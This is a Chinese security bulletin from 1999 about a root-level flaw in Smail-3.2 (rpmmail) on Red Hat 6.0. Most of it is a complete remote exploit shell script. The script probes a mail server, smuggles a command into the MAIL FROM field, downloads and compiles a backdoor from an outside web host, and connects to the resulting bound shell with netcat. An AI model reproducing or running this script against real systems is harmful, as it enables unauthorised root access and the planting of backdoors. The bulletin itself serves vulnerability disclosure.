绿盟安全月刊->第4期->最新漏洞 Smail-3.2 (rpmmail)的溢出漏洞

日期：1999-12-14

Smail-3.2 (rpmmail)的溢出漏洞

漏洞类型：远程、本地   
  
发布日期：1999-10-20   
更新日期：1999-11-29   
  
影响系统：   
Red Hat 6.0   
  
漏洞描述：   
  
在Red Hat 6.0 附加应用程序CD中的Smail-3.2 (rpmmail)存在一个漏洞。可以让远程或本   
地攻击者获得root权限。   
  
检验程序：   
  
#!/bin/sh   
# remote root exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com]   
# greets to:   
# all of gH, "Brock Tellier" for discovering the hole.   
# special greets to:   
# icesk, mosthated, elux, rhodie, and the rest of #bifemlinux @ undernet   
# ---- Brock Tellier''s original advisory   
# Greetings,   
#   
# A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0   
# Extra Applications CD. The potential compromise for this bug could be remote   
# or local root or simply remote command execution as "nobody" or similar,   
# depending on your system configuration.   
#   
# By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can   
# get /home/rpmmail/rpmmail (suid root by default, exec''d by .forward remotely)   
# to system(3) any command you wish. The command executed does not necessarily   
# have root privs because of bash''s handling of euid != uid of caller. Although   
# system(3) calls /bin/sh -c, it is linked by default (can anyone verify   
# these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the   
# system(3) man page:   
#   
# system() will not, in fact, work properly from programs   
# with suid or sgid privileges on systems on which   
# /bin/sh is bash version 2, since bash 2 drops privileges   
# on startup. (Debian uses a modified bash which does not   
# do this when invoked as sh.)   
#   
# Thus some systems with rpmmail installed are vulnerable to local/remote root,   
# all others to remote command execution as an unpriv''d user.   
# --- end Brock''s text   
  
# you need to have backdoor source somewhere out on the net   
BACKDOOR="http://meltingpot.fortunecity.com/rundberg/521/blackhole.c "   
  
if [ "$1" = "" ]; then   
echo "usage: $0 "   
exit 0   
fi   
  
if [ `which nc` = "" ]; then   
echo "this script requires netcat [nc]"   
exit 0   
fi   
  
rmt=`host $1 | grep -i "$1" | grep -i "has address" | awk ''{print $4}''`   
if [ "$rmt" = "" ]; then   
echo "unable to obtain address for $1"   
exit 0   
fi   
  
echo "= remote exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com] ="   
echo -n "[**]: Making sure the system is vulnerable.. "   
(sleep 1;echo "EXPN rpmmail";sleep 1)|nc -w 4 $1 25 1>vuln.tmp 2>vuln.tmp   
cat vuln.tmp | grep "250" | grep "rpmmail -c" >/dev/null 2>&1   
if [ ! $? -eq 0 ]; then   
echo "no!"   
exit 0   
fi   
echo "yes!"   
  
echo -n "[**]: Setting up our tcp bound shell.. "   
(sleep 1;echo 'MAIL FROM: ;lynx\x20-dump\x20$BACKDOOR\x201>unf.c\x202>unf.c\x20;
    gcc\x20-o\x20unf\x20unf.c\x20;./unf\x20&;';
    sleep 1;echo "RCPT TO: rpmmail";
    sleep 1;echo "DATA";
    sleep 1;echo "unf";echo ".";
    sleep 2;echo "quit")|nc -w 4 $1 25 1>vuln.tmp 2>vuln.tmp   
cat vuln.tmp | grep -i " 250 Mail accepted" >/dev/null 2>&1   
if [ ! $? -eq 0 ]; then   
echo "failed!"   
exit 0   
fi   
echo "success!"   
  
echo -n "[**]: Attempting to obtain access.. "   
nc -w 3 $1 5300   
echo "done."   
  
echo -n "[**]: Cleaning up local mess.. "   
rm vuln.tmp   
killall -9 nc 1>/dev/null 2>/dev/null   
echo "done."